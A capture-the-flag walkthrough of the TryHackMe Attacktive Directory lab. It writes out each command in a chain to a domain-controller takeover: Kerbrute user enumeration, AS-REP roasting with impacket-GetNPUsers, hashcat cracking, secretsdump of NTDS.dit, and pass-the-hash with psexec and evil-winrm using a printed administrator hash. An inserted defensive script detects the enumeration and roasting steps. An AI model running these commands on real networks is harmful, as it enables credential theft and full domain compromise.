TryHackMe Attacktive Directory


This room was great for understanding how to abuse Kerberos, a key authentication service within Active Directory. Tools such as Impacket, Kerbrute, and Evil-WinRM were also big wins while completing this THM room!

sudo nmap -sS -sC -sV -O -A -vvv -oA THM-ATTACKTIVE-Directory 10.10.58.99


Generating HTML Nmap Reports

xsltproc THM-ATTACKTIVE-Directory.xml -o THM_Attacktive_Directory_nmap-output.html

  • Creating HTML reports may help you better visualize your target scans. Some may also find it useful to observe these scans through the CLI... user preference, I guess...

Service Brute Force “Kerbrute”

Download Kerbrute and make it executable with chmod +x

https://github.com/ropnop/kerbrute/releases/tag/v1.0.3

When using Kerbrute choose a user and password list that is suitable for this type of attack. Keep in mind that brute forcing accounts could have adverse effects on the target.

Examples:

sudo nano user.txt

  • Adam

  • Sam

  • Bob

sudo nano password.txt

  • Password

  • Password123

  • Mypassword

In our past scan, we found the DNS name of our target. It’s best to add the IP and DNS name to the /etc/hosts file.

You can use spookysec.local as well when configuring your hosts file for IP name resolution.


Successful ping using DNS name!

Now let’s use Kerbrute with a few flags and switches

sudo ./kerbrute_linux_amd64 userenum --dc spookysec.local -d spookysec.local user.txt

Next, we’ll use Impacket-GetNPUsers and target svc-admin@spookysec.local

Website Reference: https://wadcoms.github.io/wadcoms/Impacket-GetNPUsers/

Syntax used:

impacket-GetNPUsers spookysec.local/ -dc-ip 10.10.58.99 -usersfile svc-admin.txt -format hashcat -outputfile hashes.txt

Success!!

Looks like we have a Kerberos 5, etype 23, AS-REP hash, which is hashcat mode 18200

Reference: https://hashcat.net/wiki/doku.php?id=example_hashes
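Added example, not part of the original notes: detection logic a defender could run over domain-controller Security-log records to spot the two steps above, Kerbrute user enumeration and the pre-auth-less AS-REP request that GetNPUsers makes. The records are constructed to mirror Event ID 4768 fields; the source IPs, timestamps and thresholds are assumptions.

```python
# Detection for Kerbrute-style user enumeration and AS-REP roasting, run over
# constructed Security-log records (not real telemetry from the room). Keys mirror
# Windows Event ID 4768 ("A Kerberos authentication ticket (TGT) was requested").
from collections import defaultdict
from datetime import datetime

# Constructed sample events. Result code 0x6 = client principal not found (a guessed
# username that does not exist); a successful request (0x0) with PreAuthType 0 and
# RC4 (0x17) is what a GetNPUsers-style AS-REP request looks like on the DC.
EVENTS = [
    {"time": "2021-05-01T10:00:01", "user": "adam", "ip": "10.10.14.5", "status": "0x6", "preauth": "0", "etype": "0x17"},
    {"time": "2021-05-01T10:00:01", "user": "sam", "ip": "10.10.14.5", "status": "0x6", "preauth": "0", "etype": "0x17"},
    {"time": "2021-05-01T10:00:02", "user": "bob", "ip": "10.10.14.5", "status": "0x6", "preauth": "0", "etype": "0x17"},
    {"time": "2021-05-01T10:00:03", "user": "svc-admin", "ip": "10.10.14.5", "status": "0x0", "preauth": "0", "etype": "0x17"},
    {"time": "2021-05-01T10:05:00", "user": "backup", "ip": "10.10.10.20", "status": "0x0", "preauth": "2", "etype": "0x12"},
]

def find_asrep_roasting(events):
    """Successful TGT requests with no pre-authentication and RC4 (etype 23) yield
    the hashes hashcat mode 18200 cracks; return the (ip, user) pairs involved."""
    return [(e["ip"], e["user"]) for e in events
            if e["status"] == "0x0" and e["preauth"] == "0" and e["etype"] == "0x17"]

def find_user_enumeration(events, window_seconds=60, min_unknown=3):
    """One source asking the KDC for many distinct non-existent principals (0x6)
    inside a short window is the footprint of a username wordlist being tried."""
    by_ip = defaultdict(list)
    for e in events:
        if e["status"] == "0x6":
            by_ip[e["ip"]].append((datetime.fromisoformat(e["time"]), e["user"]))
    hits = {}
    for ip, reqs in by_ip.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            users = {u for t, u in reqs[i:] if (t - t0).total_seconds() <= window_seconds}
            if len(users) >= min_unknown:
                hits[ip] = sorted(users)  # assumed threshold: 3 unknown users / 60 s
                break
    return hits

if __name__ == "__main__":
    print("AS-REP roasting:", find_asrep_roasting(EVENTS))
    print("User enumeration:", find_user_enumeration(EVENTS))
```

The same two checks apply to real 4768 events once TargetUserName, IpAddress, Status, PreAuthType and TicketEncryptionType are mapped onto these keys.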

Let’s crack it. Reference site below

https://hackernfo.com/hacking/PasswordCracking/

Syntax:

hashcat -a 0 -m 18200 svc-admin-hash.txt password.txt

Now we have the service account and the password!!

Let’s use Smbclient with username and password to list shares

We have found some interesting share files. Let’s connect and enumerate more information from backup share!

Now that we have the backup account creds and the svc-admin creds, it’s time to priv-esc and grab the NTDS.dit file using “Impacket-SecretsDump”

impacket-secretsdump -outputfile dc-dump.txt spookysec.local/backup:<BACKUP_PASSWORD>@spookysec.local

We can also use Impacket-PsExec to pass the hash (PTH) and authenticate to the DC remotely!!

Bingo!!

impacket-psexec -hashes 00000000000000000000000000000000:0e0363213e37b94221497260b0bcb4fc administrator@spookysec.local

Another tool we can use is Evil-WinRM with the Administrator hash to remotely authenticate to the DC, as seen below.

evil-winrm -i spookysec.local -u administrator -H 0e0363213e37b94221497260b0bcb4fc

Looks like we owned the DC. Hope these notes helped!
